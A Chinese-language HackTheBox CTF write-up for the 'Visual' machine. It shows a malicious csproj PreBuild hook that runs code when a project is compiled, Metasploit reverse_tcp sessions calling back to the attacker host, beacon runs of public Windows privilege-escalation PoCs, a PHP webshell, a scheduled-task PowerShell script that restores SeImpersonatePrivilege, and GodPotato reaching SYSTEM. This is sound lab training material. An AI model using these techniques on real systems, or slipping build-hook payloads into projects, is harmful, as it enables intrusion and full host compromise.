HackTheBox Visual Writeup

Visual是HackTheBox上的一个Medium难度的靶机，它提供了一个通过恶意Visual Studio项目控制主机的场景，同时也是学习Windows提权的不错选择。

靶场信息

完成靶机需要的知识：

• C#、.NET相关知识
• 搭建Git服务器
• Windows提权

信息收集

端口扫描

kali@kali ~/D/H/M/Visual> nmap -p- -n --min-rate 3000 -T4 10.10.11.234
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-25 23:44 CST
Nmap scan report for 10.10.11.234
Host is up (0.26s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 78.79 seconds
kali@kali ~/D/H/M/Visual> sudo nmap -Pn -p- -n --min-rate 3000 -T4 -sU 10.10.11.234
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-25 23:46 CST
Nmap scan report for 10.10.11.234
Host is up.
All 65535 scanned ports on 10.10.11.234 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 44.60 seconds

TCP和UDP的扫描结果都显示只有80端口开放。

漏洞点识别

打开web界面，提示支持上传Git项目链接（支持.NET 6.0 和 C# 项目，必须包含.sln文件），靶机会自动进行编译。

这个场景很明显可以联想到恶意的VS项目钓鱼，原来在推特上看到过相关帖子。

初始权限

本地Git服务

使用Gitea进行本地Git服务的搭建，参照Gitea手册中Installation with Docker章节可以很简单创建Gitea服务。

新建一个docker-compose.yml文件，内容如下：

version: "3"

networks:
  gitea:
    external: false

services:
  server:
    image: gitea/gitea:latest
    container_name: gitea
    environment:
      - USER_UID=1000
      - USER_GID=1000
    restart: always
    networks:
      - gitea
    volumes:
      - ./gitea:/data
      - /etc/timezone:/etc/timezone:ro
      - /etc/localtime:/etc/localtime:ro
    ports:
      - "80:3000"

官方手册里默认是3000端口，我这里修改成了80端口。

使用docker-compose启动服务，命令为sudo docker-compose up。

运行后，Gitea文件目录的结构如下:

[4.0K]  .
├── [ 383]  docker-compose.yml
└── [4.0K]  gitea
    ├── [4.0K]  git
    ├── [4.0K]  gitea
    └── [4.0K]  ssh

5 directories, 1 file

访问本地的80端口，即可进入Gitea的初始化安装界面。

完成安装后，默认新注册的第一个用户是系统管理员，新建一个Git Repository，注意不能将该项目设置成私有项目。

将新建的Repo链接提交给靶机环境进行编译，可以在Gitea后台日志中看到靶机服务器的请求，但编译的结果提示[-] The repository doesn't contain a .sln file or the URL submitted is invalid.。

证明靶机服务器确实会抓取本地Git项目，而且会检验git仓库是否包含.sln文件。

恶意的Visual Studio项目

一开始，我并没有想着在本地Visual Studio中创建项目，而是认为在Github中应该会有成熟的Poc。╮(￣▽￣”)╭

一番搜索之后确实发现了一些信息：

• EvilSln: Don’t open .sln files
• EvilSln

第二个链接很明显是为了HTB做题而创建的项目，想到这里，我又想自己实践下、觉得直接用现成的payload没啥意思。

本地创建C#项目

新建C#控制台项目：

设置Pre-Build命令：

设置命令之后的项目文件ConsoleApp1.csproj内容如下：

<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="notepad.exe" />
  </Target>

</Project>

本地点击编译按钮时确实能成功调出记事本程序。

提交靶机编译

将文件提交至Gitea服务：

git init -b main
git remote add origin http://10.10.14.101/a/a1.git
git pull
git status
git add *
git commit -m init
git push --set-upstream -f origin main

再次提交给靶机服务器编译，提示超时：

编译超时的可能原因有很多，可能是记事本程序影响了编译过程。

注释掉在/ConsoleApp1.csproj中PreBuild相关配置后，再次提交编译，反馈编译报错：

查看报错信息，报错点是找不到C:\Program Files (x86)\Microsoft Visual Studio\Shared\NuGetPackages目录。

报错日志

"C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.sln" (default target) (1) ->
"C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj" (default target) (2) ->
(ResolvePackageAssets target) -> 
  C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: The "ResolvePackageAssets" task failed unexpectedly. [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018: NuGet.Packaging.Core.PackagingException: Unable to find fallback package folder 'C:\Program Files (x86)\Microsoft Visual Studio\Shared\NuGetPackages'. [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018:    at NuGet.Packaging.FallbackPackagePathResolver..ctor(String userPackageFolder, IEnumerable`1 fallbackPackageFolders) [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018:    at Microsoft.NET.Build.Tasks.NuGetPackageResolver.CreateResolver(IEnumerable`1 packageFolders) [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018:    at Microsoft.NET.Build.Tasks.NuGetPackageResolver.CreateResolver(LockFile lockFile) [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018:    at Microsoft.NET.Build.Tasks.ResolvePackageAssets.CacheWriter..ctor(ResolvePackageAssets task) [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018:    at Microsoft.NET.Build.Tasks.ResolvePackageAssets.CacheReader.CreateReaderFromDisk(ResolvePackageAssets task, Byte[] settingsHash) [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018:    at Microsoft.NET.Build.Tasks.ResolvePackageAssets.CacheReader..ctor(ResolvePackageAssets task) [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018:    at Microsoft.NET.Build.Tasks.ResolvePackageAssets.ReadItemGroups() [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018:    at Microsoft.NET.Build.Tasks.ResolvePackageAssets.ExecuteCore() [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018:    at Microsoft.NET.Build.Tasks.TaskBase.Execute() [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018:    at Microsoft.Build.BackEnd.TaskExecutionHost.Microsoft.Build.BackEnd.ITaskExecutionHost.Execute() [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]
C:\Program Files\dotnet\sdk\7.0.302\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(266,5): error MSB4018:    at Microsoft.Build.BackEnd.TaskBuilder.<ExecuteInstantiatedTask>d__26.MoveNext() [C:\Windows\Temp\539b15f0d47a81a0aa27dc0d608809\ConsoleApp1.csproj]

    0 Warning(s)
    1 Error(s)

Time Elapsed 00:00:02.06

删除/obj/project.assets.json中NuGet相关配置，再次提交编译，编译成功：

调整payload

取消在/ConsoleApp1.csproj中PreBuild相关配置的注释，再次提交编译，又提示超时了。。。╮(￣▽￣”)╭/

将payload改成msfvenom的后门程序，可以直接得到shell。。。

用户权限

metasploit拿到的权限对应enox用户，可以拿到用户flag。

提权过程中进行了很多无头无脑的尝试，或者说对于windows提权，我本来就是一头雾水。

进行了如下尝试：

• winpeas
• msf的local_exploit_suggester

local_exploit_suggester失败尝试记录

local_exploit_suggester结果

msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.11.234 - Collecting local exploits for x64/windows...
[*] 10.10.11.234 - 189 exploit checks are being tried...
[+] 10.10.11.234 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2022_21882_win32k: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 45 / 45
[*] 10.10.11.234 - Valid modules for session 2:

尝试提权记录

msf6 exploit(windows/local/cve_2020_1337_printerdemon) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Attempting to PrivEsc on VISUAL via session ID: 2
[-] Exploit aborted due to failure: bad-config: Payload arch must match target arch
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > set -g payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Attempting to PrivEsc on VISUAL via session ID: 2
[*] Running Exploit on VISUAL
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > use exploit/windows/local/cve_2022_21882_win32k
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_21882_win32k) > run

[*] Started reverse TCP handler on 10.10.14.46:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Launching msiexec to host the DLL...
[+] Process 1732 launched.
[*] Reflectively injecting the DLL into 1732...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2022_21882_win32k) > use exploit/windows/local/cve_2022_21999_spoolfool_privesc
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > run

[*] Started reverse TCP handler on 10.10.14.46:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out
[-] run: Interrupted
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > run

[*] Started reverse TCP handler on 10.10.14.46:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out
[-] run: Interrupted
msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

winpeas 尝试记录

winpeas给出的可能漏洞

 [?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
[*] OS Version: 1809 (17763)
[*] Enumerating installed KBs...
[!] CVE-2019-0836 : VULNERABLE
 [>] https://exploit-db.com/exploits/46718
 [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/

[!] CVE-2019-0841 : VULNERABLE
 [>] https://github.com/rogue-kdc/CVE-2019-0841
 [>] https://rastamouse.me/tags/cve-2019-0841/

[!] CVE-2019-1064 : VULNERABLE
 [>] https://www.rythmstick.net/posts/cve-2019-1064/

[!] CVE-2019-1130 : VULNERABLE
 [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

[!] CVE-2019-1253 : VULNERABLE
 [>] https://github.com/padovah4ck/CVE-2019-1253
 [>] https://github.com/sgabe/CVE-2019-1253

[!] CVE-2019-1315 : VULNERABLE
 [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

[!] CVE-2019-1385 : VULNERABLE
 [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

[!] CVE-2019-1388 : VULNERABLE
 [>] https://github.com/jas502n/CVE-2019-1388

[!] CVE-2019-1405 : VULNERABLE
 [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
 [>] https://github.com/apt69/COMahawk

[!] CVE-2020-0668 : VULNERABLE
 [>] https://github.com/itm4n/SysTracingPoc

[!] CVE-2020-0683 : VULNERABLE
 [>] https://github.com/padovah4ck/CVE-2020-0683
 [>] https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1

[!] CVE-2020-1013 : VULNERABLE
 [>] https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/

[*] Finished. Found 12 potential vulnerabilities.

尝试记录

  [?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
 [*] OS Version: 1809 (17763)
 [*] Enumerating installed KBs...
 [!] CVE-2019-0836 : VULNERABLE
  [>] https://exploit-db.com/exploits/46718
  [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/

beacon> run C:\Users\enox\desktop\PoC_LUAFV_PostReadWriteCallback_EoP.exe
[*] Tasked beacon to run: C:\Users\enox\desktop\PoC_LUAFV_PostReadWriteCallback_EoP.exe
[+] host called home, sent: 79 bytes
[+] received output:
Base Path: C:\ProgramData\luafv_c9f12450-7f23-467a-a039-cab4009e1a9a
Trying to map C:\Windows\system32\license.rtf R/W
NtApiDotNet.NtException: (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.
   at NtApiDotNet.NtObjectUtils.ToNtException(NtStatus status, Boolean throw_on_error)
   at NtApiDotNet.NtFile.DoLinkRename(FileInformationClass file_info, String linkname, NtFile root, Boolean replace_if_exists)
   at NtApiDotNet.NtFile.CreateHardlink(String path, String linkname)
   at PoC_LUAFV_PostReadWriteCallback_EoP.Program.RemapFileAsRW()
   at PoC_LUAFV_PostReadWriteCallback_EoP.Program.Main(String[] args)



 [!] CVE-2019-0841 : VULNERABLE
  [>] https://github.com/rogue-kdc/CVE-2019-0841
  [>] https://rastamouse.me/tags/cve-2019-0841/

beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe
[*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe
[+] host called home, sent: 57 bytes
[+] received output:
    # Privileged DACL Overwrite EoP
    # CVE: CVE-2019-0841
    # Exploit Author: Nabeel Ahmed (@rogue_kdc)
    # Tested on: Microsoft Windows 10 x32 & x64
    # Category: Local
-------------------------------------------------
[+] Usage: exploit.exe <path to file to takeover>
[+] (E.g., exploit.exe C:\Windows\win.ini
-------------------------------------------------

beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt
[*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt
[+] host called home, sent: 97 bytes
[+] received output:
[+] You don't have 'Modify/Write' privileges on this file ...

beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\
[*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\
[+] host called home, sent: 81 bytes
[+] received output:
[+] Something went wrong: No such file or directory

beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt
[*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt
[+] host called home, sent: 97 bytes
[+] received output:
[+] You don't have 'Modify/Write' privileges on this file ...

beacon> run C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\sam
[*] Tasked beacon to run: C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\sam
[+] host called home, sent: 88 bytes
[+] received output:
[+] You don't have 'Modify/Write' privileges on this file ...

beacon> run C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\system
[*] Tasked beacon to run: C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\system
[+] host called home, sent: 91 bytes
[+] received output:
[+] You don't have 'Modify/Write' privileges on this file ...


 [!] CVE-2019-1064 : VULNERABLE
  [>] https://www.rythmstick.net/posts/cve-2019-1064/

beacon> run C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Users\Administrator\
[*] Tasked beacon to run: C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Users\Administrator\
[+] host called home, sent: 83 bytes
[+] received output:
[+] C:\Users\Administrator\ not found

beacon> run C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\system
[*] Tasked beacon to run: C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\system
[+] host called home, sent: 93 bytes
[+] received output:
[+] C:\Windows\System32\config\system not found

beacon> run C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\sam
[*] Tasked beacon to run: C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\sam
[+] host called home, sent: 90 bytes
[+] received output:
[+] C:\Windows\System32\config\sam not found


 [!] CVE-2019-1130 : VULNERABLE
  [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

 [!] CVE-2019-1253 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2019-1253
  [>] https://github.com/sgabe/CVE-2019-1253

 [!] CVE-2019-1315 : VULNERABLE
  [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

 [!] CVE-2019-1385 : VULNERABLE
  [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

 [!] CVE-2019-1388 : VULNERABLE
  [>] https://github.com/jas502n/CVE-2019-1388

 [!] CVE-2019-1405 : VULNERABLE
  [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
  [>] https://github.com/apt69/COMahawk

 [!] CVE-2020-0668 : VULNERABLE
  [>] https://github.com/itm4n/SysTracingPoc


 [!] CVE-2020-0683 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2020-0683
  [>] https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1

PS C:\Users\enox\Desktop> .\MsiExploit.exe C:\Users\Administrator\
.\MsiExploit.exe C:\Users\Administrator\
The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance.
The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance.
This action is only valid for products that are currently installed.

 [!] CVE-2020-1013 : VULNERABLE
  [>] https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/

PS C:\Users\enox\Desktop> .\WSuspicious.exe
.\WSuspicious.exe
No WSUS Server detected.
Stopping now.
PS C:\Users\enox\Desktop> .\WSuspicious.exe /exe:.\reverse.exe
.\WSuspicious.exe /exe:.\reverse.exe
No WSUS Server detected.
Stopping now.

思考

上面大量的尝试没用之后，我开始想我现在用户的权限：

C:\Windows\Temp\9b7ed8d62ccca237f8c62c20c52f1b>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

根据搜索，我判断这里面重要的是SeCreateGlobalPrivilege这个权限。
互联网上搜索，大多是都有SeImpersonatePrivilege这个权限，而这里并没有。

接着找到了这篇文章Give Me Back My Privileges! Please?，文章里面的场景和我这里很像。

我直接拿里面的Powershell脚本去创建计划任务，但始终没成功运行：

$TaskAction = New-ScheduledTaskAction -Execute "C:\xampp\htdocs\a4445.exe";Register-ScheduledTask -Action $TaskAction -TaskName "SomeTask4";Start-ScheduledTask -TaskName "SomeTask4";Get-ScheduledTaskInfo -TaskName "SomeTask4"

到这里我已经花了很长时间了，我给自己定了一个dealine，到某个时刻如果还没搞出来，就看Writeup了。

root权限

我看了这篇https://maddevs.io/writeups/hackthebox-visual/。

前面思路都一样，提权那里题解提到很关键的一个点，通过webshell得到local service的权限。

我复现时拿到webshell权限之后确实可以成功创建计划任务，进而恢复SeImpersonatePrivilege权限、拿到System权限。

local service

在Reverse Shell Generator使用PHP Ivan Sincek生成webshell，上传至C:/xampp/htdocs目录，在本地环境访问，即可得到shell。

PHP pentestmonkey生成的使用会报错。

恢复 SeImpersonatePrivilege 权限

这里主要参照Give Me Back My Privileges! Please?进行，值得注意的是，原始payload申请的权限很多（$Privs的值），导致创建计划任务失败，我限定为需要的权限之后可成功创建。

# 分行脚本
$NName = "SomeTask12";
[System.String[]]$Privs = "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege";
$TaskPrincipal = New-ScheduledTaskPrincipal -UserId "nt authority\local service" -LogonType ServiceAccount -RequiredPrivilege $Privs;
$TaskAction = New-ScheduledTaskAction -Execute "C:\xampp\htdocs\a4446.exe";
Register-ScheduledTask -Action $TaskAction -TaskName $NName -Principal $TaskPrincipal;
Start-ScheduledTask -TaskName $NName;
Get-ScheduledTaskInfo -TaskName $NName

# 一行脚本
$NName = "SomeTask13";$cmd = "C:\xampp\htdocs\a.exe";[System.String[]]$Privs = "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege";$TaskPrincipal = New-ScheduledTaskPrincipal -UserId "nt authority\local service" -LogonType ServiceAccount -RequiredPrivilege $Privs;$TaskAction = New-ScheduledTaskAction -Execute $cmd;Register-ScheduledTask -Action $TaskAction -TaskName $NName -Principal $TaskPrincipal;Start-ScheduledTask -TaskName $NName;Get-ScheduledTaskInfo -TaskName $NName

如果运行失败了，需要修改$NName值，不然会提示计划任务名称重复。

提权到SYSTEM

从SeImpersonatePrivilege提权到SYSTEM方式很多，我没有尝试其他的，直接使用了题解里给出的GodPotato。

GodPotato-NET4.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\root.txt"

总结

• 如果给breakpoint对对子的话，我觉得deadline很不错。
• 学而不思则罔，思而不学则殆。